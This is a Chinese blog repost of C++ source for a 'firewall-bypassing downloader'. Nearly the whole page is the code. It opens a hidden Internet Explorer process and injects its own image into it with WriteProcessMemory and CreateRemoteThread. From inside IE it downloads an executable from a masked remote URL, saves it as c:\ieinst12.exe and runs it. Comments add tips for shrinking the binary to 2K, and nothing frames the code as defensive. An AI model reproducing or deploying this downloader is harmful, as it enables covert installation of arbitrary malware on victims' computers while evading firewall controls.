可以穿墙的下载者VC源码-白红宇

可以穿墙的下载者VC源码

阅读量：7053 次

发布时间：2019-06-28

本文共 2422 字，大约阅读时间需要 8 分钟。

/*“mini_downloader”code bykardinal p.s.tcompile by vc++ 6.0can not run under win98;*/#include 
     
      #pragma comment(lib,”user32.lib”)#pragma comment(lib,”kernel32.lib”)//#pragma comment(linker, “/OPT:NOWIN98″)   //取消这几行的注释，编译出的文件只有2K大小//#pragma comment(linker, “/merge:.data=.text”)//#pragma comment(linker, “/merge:.rdata=.text”)//#pragma comment(linker, “/align:0×200″)#pragma comment(linker, “/ENTRY:main”)#pragma comment(linker, “/subsystem:windows”)#pragma comment(linker, “/BASE:0×13150000″)HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数HANDLE processhandle;DWORD pid;HINSTANCE hshell,hurlmon;void download() //注入使用的下载函数{hshell=LoadLibrary(“Shell32.dll”);hurlmon=LoadLibrary(“urlmon.dll”);(FARPROC&)SHELLRUN=GetProcAddress(hshell,”ShellExecuteA”);(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,”URLDownloadToFileA”);DOWNFILE(NULL,”http://www.xxxxxxx.cn/en/notepad.exe”,”c:\\ieinst12.exe”,0, NULL);SHELLRUN(0,”open”,”c:\\ieinst12.exe”,NULL,NULL,5);ExitProcess(0);};void main() //主函数{//1.得到IE路径,并运行char iename[MAX_PATH],iepath[MAX_PATH];ZeroMemory(iename,sizeof(iename));ZeroMemory(iepath,sizeof(iepath));GetWindowsDirectory(iepath,MAX_PATH);strncpy(iename,iepath,3);strcat(iename,”program files\\Internet Explorer\\IEXPLORE.EXE”);//strcat(iename,”windows\\notepad.EXE”);WinExec(iename,SW_HIDE);Sleep(500);//2.得到 IE process handleHWND htemp;htemp=FindWindow(“IEFrame”,NULL);GetWindowThreadProcessId(htemp,&pid);processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);//3.分配内存HMODULE Module;LPVOID NewModule;DWORD Size;LPDWORD lpimagesize;Module = GetModuleHandle(NULL);//进程映像的基址//得到内存镜像大小_asm{push eax;push ebx;mov ebx,Module;mov eax,[ebx+0x3c];lea eax,[ebx+eax+0x50];mov eax,[eax]mov lpimagesize,eax;pop ebx;pop eax;};Size=(DWORD)lpimagesize;NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置//4.写内存，创建线程WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据LPTHREAD_START_ROUTINE entrypoint;__asm{push eax;lea eax,download;mov entrypoint,eax;pop eax}CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行//5.关闭对象CloseHandle(processhandle);return;}

转载于:https://www.cnblogs.com/rogee/archive/2011/05/24/2055906.html

你可能感兴趣的文章

iOS开发～CocoaPods使用详细说明

查看>>